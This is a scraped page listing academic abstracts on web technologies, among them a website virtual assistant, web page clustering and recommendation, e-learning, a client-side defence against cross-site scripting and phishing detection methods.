scholarly journals A Virtual Assistant for Websites

Author(s):  
José Luiz Andrade Duizith ◽  
Lizandro Kirst Da Silva ◽  
Daniel Ribeiro Brahm ◽  
Gustavo Tagliassuchi ◽  
Stanley Loh

This work presents a Virtual Assistant (VA) whose main goal is to supply information for Websites users. AVA is a software system that interacts with persons through a Web browser, receiving textual questions and answering automatically without human intervention. The VA supplies information by looking for similar questions in a knowledge base and giving the corresponding answer. Artificial Intelligence techniques are employed in this matching process, to compare the user’s question against questions stored in the base. The main advantage of using the VA is to minimize information overload when users get lost in Websites. The VA can guide the user across the web pages or directly supply information. This is especially important for customers visiting an enterprise site, looking for products, services or prices or needing information about some topic. The VA can also help in Knowledge Management processes inside enterprises, offering an easy way for people storing and retrieving knowledge. An extra advantage is to reduce the structure of Call Centers, since the VA can be given to customers in a CD-ROM. Furthermore, the VA provides Webmasters with statistics about the usage of the VA (themes more asked, number of visitants, time of conversation).

2003 ◽  
Vol 9 (1) ◽  
pp. 17-22 ◽  
Author(s):  
E D Lemaire ◽  
G Greene

We produced continuing education material in physical rehabilitation using a variety of electronic media. We compared four methods of delivering the learning modules: in person with a computer projector, desktop videoconferencing, Web pages and CD-ROM. Health-care workers at eight community hospitals and two nursing homes were asked to participate in the project. A total of 394 questionnaires were received for all modalities: 73 for in-person sessions, 50 for desktop conferencing, 227 for Web pages and 44 for CD-ROM. This represents a 100% response rate from the in-person, desktop conferencing and CD-ROM groups; the response rate for the Web group is unknown, since the questionnaires were completed online. Almost all participants found the modules to be helpful in their work. The CD-ROM group gave significantly higher ratings than the Web page group, although all four learning modalities received high ratings. A combination of all four modalities would be required to provide the best possible learning opportunity.


2015 ◽  
Vol 21 (5) ◽  
pp. 661-664
Author(s):  
ZORNITSA KOZAREVA ◽  
VIVI NASTASE ◽  
RADA MIHALCEA

Graph structures naturally model connections. In natural language processing (NLP) connections are ubiquitous, on anything between small and web scale. We find them between words – as grammatical, collocation or semantic relations – contributing to the overall meaning, and maintaining the cohesive structure of the text and the discourse unity. We find them between concepts in ontologies or other knowledge repositories – since the early ages of artificial intelligence, associative or semantic networks have been proposed and used as knowledge stores, because they naturally capture the language units and relations between them, and allow for a variety of inference and reasoning processes, simulating some of the functionalities of the human mind. We find them between complete texts or web pages, and between entities in a social network, where they model relations at the web scale. Beyond the more often encountered ‘regular’ graphs, hypergraphs have also appeared in our field to model relations between more than two units.


Author(s):  
Ben Choi

Web mining aims for searching, organizing, and extracting information on the Web and search engines focus on searching. The next stage of Web mining is the organization of Web contents, which will then facilitate the extraction of useful information from the Web. This chapter will focus on organizing Web contents. Since a majority of Web contents are stored in the form of Web pages, this chapter will focus on techniques for automatically organizing Web pages into categories. Various artificial intelligence techniques have been used; however the most successful ones are classification and clustering. This chapter will focus on clustering. Clustering is well suited for Web mining by automatically organizing Web pages into categories each of which contain Web pages having similar contents. However, one problem in clustering is the lack of general methods to automatically determine the number of categories or clusters. For the Web domain, until now there is no such a method suitable for Web page clustering. To address this problem, this chapter describes a method to discover a constant factor that characterizes the Web domain and proposes a new method for automatically determining the number of clusters in Web page datasets. This chapter also proposes a new bi-directional hierarchical clustering algorithm, which arranges individual Web pages into clusters and then arranges the clusters into larger clusters and so on until the average inter-cluster similarity approaches the constant factor. Having the constant factor together with the algorithm, this chapter provides a new clustering system suitable for mining the Web.


2012 ◽  
Vol 28 (2) ◽  
pp. 176-184 ◽  
Author(s):  
Alfred Loo

The Internet is an effective learning tool for gifted children because it allows them to independently select the areas in which they have talent. The Internet also enables children to discover and maximize their potential. However, younger children might not have a large enough vocabulary to surf the Internet, even if they are gifted. For example, children who are creatively gifted might not have exceptional reading ability. To solve this problem, a special web browser was used to generate human speech according to the words that appeared on the web pages displayed. Experiments involving about 100 kindergarteners were conducted to assess the effectiveness of our approach. This paper demonstrates the feasibility of this web browser in enabling kindergarten children aged 3–6 years old to surf the Internet.


2018 ◽  
Vol 8 (4) ◽  
pp. 1-13
Author(s):  
Rajnikant Bhagwan Wagh ◽  
Jayantrao Bhaurao Patil

Recommendation systems are growing very rapidly. While surfing, users frequently miss the goal of their search and lost in information overload problem. To overcome this information overload problem, the authors have proposed a novel web page recommendation system to save surfing time of user. The users are analyzed when they surf through a particular web site. Authors have used relationship matrix and frequency matrix for effectively finding the connectivity among the web pages of similar users. These webpages are divided into various clusters using enhanced graph based partitioning concept. Authors classify active users more accurately to found clusters. Threshold values are used in both clustering and classification stages for more appropriate results. Experimental results show that authors get around 61% accuracy, 37% coverage and 46% F1 measure. It helps in improved surfing experience of users.


Author(s):  
Juan Manuel Adan-Coello ◽  
Carlos Miguel Tobar ◽  
João Luís Garcia Rosa ◽  
Ricardo Luís de Freitas

The objective of this chapter is to discuss relevant applications of Semantic Web technologies in the field of education, emphasizing experiences that point out trends and paths that can make the educational Semantic Web a reality. The Semantic Web, through metadata, comes to make it possible that resources of every type could be localized, retrieved and processed without human intervention, helping to reduce the information overload of the current Web. The possibility of describing resources using metadata that can be processed by computers simplifies the creation of self-organizing networks of learners, information, authors, teachers, and educational institutions. The adoption of Semantic Web technologies in the e-learning field contributes to the construction of flexible and intelligent educational systems, allowing reuse, integration, and interoperation of educational and noneducational resources (content and services) distributed over the Web.


Author(s):  
Shashank Gupta ◽  
B. B. Gupta

Cross-Site Scripting (XSS) attack is a vulnerability on the client-side browser that is caused by the improper sanitization of the user input embedded in the Web pages. Researchers in the past had proposed various types of defensive strategies, vulnerability scanners, etc., but still XSS flaws remains in the Web applications due to inadequate understanding and implementation of various defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS) on the client-side Web browser for eliminating the effect of XSS vulnerability. Various earlier client-side solutions degrade the performance on the Web browser side. But in this chapter, the authors use a three-step approach to bypass the XSS attack without degrading much of the user's Web browsing experience. While auditing the experiments, this approach is capable of preventing the XSS attacks on various modern Web browsers.


Author(s):  
Shashank Gupta ◽  
B. B. Gupta

Cross-Site Scripting (XSS) attack is a vulnerability on the client-side browser that is caused by the improper sanitization of the user input embedded in the Web pages. Researchers in the past had proposed various types of defensive strategies, vulnerability scanners, etc., but still XSS flaws remains in the Web applications due to inadequate understanding and implementation of various defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS) on the client-side Web browser for eliminating the effect of XSS vulnerability. Various earlier client-side solutions degrade the performance on the Web browser side. But in this chapter, the authors use a three-step approach to bypass the XSS attack without degrading much of the user's Web browsing experience. While auditing the experiments, this approach is capable of preventing the XSS attacks on various modern Web browsers.


Phishing attack is used for identity theft with the help of social engineering and some sophisticated attacks. To attract the user by clicking a URL and is trapped to a phishing Web page. Security for user’s credentials is one of most important factor for organizations nowadays. It can be achieved through several ways like education and training. Through training and education the level of awareness will be increased also it helps to mitigate phishing. Approach with several steps is introduced in this paper, where a user must take a look or take these precautionary measures if the user is browsing any Web browser. We found it possible to detect Phishing Web pages without anti Phishing solutions. This approach contains several steps to examine whether the Web page is a real Web page or a fake Webpage. All these steps will check the phishing features exist in that Web page or not. For evaluation of our approach we analyzed the data set of Phish Tank, this data set is full of Phishing Web Pages. The purpose of evaluation is to check the features discussed in our approach to aware the user. From the following result it is resulted that the user can detect without using any Anti Phishing solution just by taking some steps to check the Web page for certain features.


2016 ◽  
Vol 4 (8) ◽  
pp. 118-135
Author(s):  
Rajendra Gupta

The phishing is a kind of e-commerce lure which try to steal the confidential information of the web user by making identical website of legitimate one in which the contents and images almost remains similar to the legitimate website with small changes. Another way of phishing is to make minor changes in the URL or in the domain of the legitimate website. In this paper, a number of anti-phishing toolbars have been discussed and proposed a system model to tackle the phishing attack. The proposed anti-phishing system is based on the development of the Plug-in tool for the web browser. The performance of the proposed system is studied with three different data mining classification algorithms which are Random Forest, Nearest Neighbour Classification (NNC), Bayesian Classifier (BC). To evaluate the proposed anti-phishing system for the detection of phishing websites, 7690 legitimate websites and 2280 phishing websites have been collected from authorised sources like APWG database and PhishTank. After analyzing the data mining algorithms over phishing web pages, it is found that the Bayesian algorithm gives fast response and gives more accurate results than other algorithms.


Sign in / Sign up

Export Citation Format

Share Document